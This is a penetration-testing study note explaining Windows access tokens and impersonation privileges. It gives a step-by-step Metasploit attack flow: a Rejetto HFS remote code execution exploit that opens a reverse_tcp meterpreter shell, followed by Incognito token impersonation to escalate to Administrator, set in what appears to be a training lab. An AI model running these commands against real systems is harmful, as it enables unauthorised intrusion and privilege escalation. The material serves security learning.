🔥Access Token Impersonation

Windows Access Tokens

• Windows access tokens are a core element of the authentication process on Windows and are created and managed by the Local Security Authority Subsystem Service (LSASS).

• A Windows access token is responsible for identifying and describing the security context of a process or thread running on a system. Simply put, an access token can be thought of as a temporary key akin to a web cookie that provides users with access to a system or network resource without having to provide credentials each time a process is started or a system resource is accessed.

• Access tokens are generated by the winlogon.exe process every time a user authenticates successfully and includes the identity and privileges of the user account associated with the thread or process. This token is then attached to the userinit.exe process, after which all child processes started by a user will inherit a copy of the access token from their creator and will run under the privileges of the same access token.

• Windows access tokens are categorized based on the varying security levels assigned to them. These security levels are used to determine the privileges that are assigned to a specific token.

• An access token will typically be assigned one of the following security levels:

  • Impersonate-level tokens are created as a direct result of a non-interactive login on Windows, typically through specific system services or domain logons.

  • Delegate-level tokens are typically created through an interactive login on Windows, primarily through a traditional login or through remote access protocols such as RDP.

• Impersonate-level tokens can be used to impersonate a token on the local system and not on any external systems that utilize the token.

• Delegate-level tokens pose the largest threat as they can be used to impersonate tokens on any system.

Windows Privileges

• The process of impersonating access tokens to elevate privileges on a system will primarily depend on the privileges assigned to the account that has been exploited to gain initial access as well as the impersonation or delegation tokens available..

• The following are the privileges that are required for a successful impersonation attack:

  • SeAssignPrimaryToken: This allows a user to impersonate tokens.

  • SeCreateToken: This allows a user to create an arbitrary token with administrative privileges.

  • SeImpersonatePrivilege: This allows a user to create a process under the securitycontext of another user typically with administrative privileges.

The Incognito Meterpreter Module

• Incognito Meterpreter Module is a built-in tool in Metasploit that was originally developed as a standalone application for token impersonation after a successful exploit.

• The Incognito module allows you to display a list of available user tokens that can be impersonated.

• It enables token impersonation, allowing you to assume different user identities and access elevated privileges on the compromised system.

• This module enhances post-exploitation capabilities, enabling deeper system access and facilitating the assessment of security risks by adopting various user tokens.

Attack Flow for the Access Token Impersonation Attack

1. Exploit Vulnerability

• Target: HTTP Rejetto web server

• Vulnerability: Remote Code Execution (RCE)

• Tool: Metasploit Framework

• Module: exploit/windows/http/rejetto_hfs_exec

• Action: Use the msfconsole to launch the exploit and gain basic access to the server.

• Command:

  Copy

  use exploit/windows/http/rejetto_hfs_exec
  set RHOSTS [Target IP]
  set PAYLOAD windows/meterpreter/reverse_tcp
  set LHOST [Your IP]
  exploit

2. Check System Information

• Action: Once you have a Meterpreter session, run the sysinfo command to gather system details.

• Command:

  Copy

  sysinfo

• Observation: Confirm the system is 32-bit (x86) based on the output.

3. Attempt to Migrate to 64-bit Shell

• Issue: You may encounter “Access is denied” if trying to migrate to a 64-bit shell because the current session is 32-bit.

• Solution: Use the incognito module to bypass this restriction instead.

4. Check Privileges

• Action: Execute the getuid command to check the current user.

• Command:

  Copy

  getuid

• Output: Shows "LOCAL SERVICE" as the current user.

• Next Step: Run getprivs to list available privileges.

• Command:

  Copy

  getprivs

5. Leverage Privileges for Token Impersonation

• Privilege: SeImpersonatePrivilege is available, allowing token impersonation.

• Action: Load the incognito module to use this privilege.

• Command:

  Copy

  load incognito

6. List Available Tokens

• Action: Display user tokens to find a higher privilege token.

• Command:

  Copy

  list_tokens -u

7. Impersonate a Higher Privilege User

• Action: Use the impersonate_token command to assume the identity of a higher privilege user.

• Command:

  Copy

  impersonate_token "ATTACKDEFENSE\Administrator"

8. Migrate to a 64-bit Shell

• Action: After impersonation, migrate to a 64-bit (x64) shell.

• Command:

  Copy

  migrate [x64 Process ID]

Hacker's Mantra:Computer hackers do not need to know each other’s real names, or even live on the same continent, to steal millions in mere hours. - Robert Mueller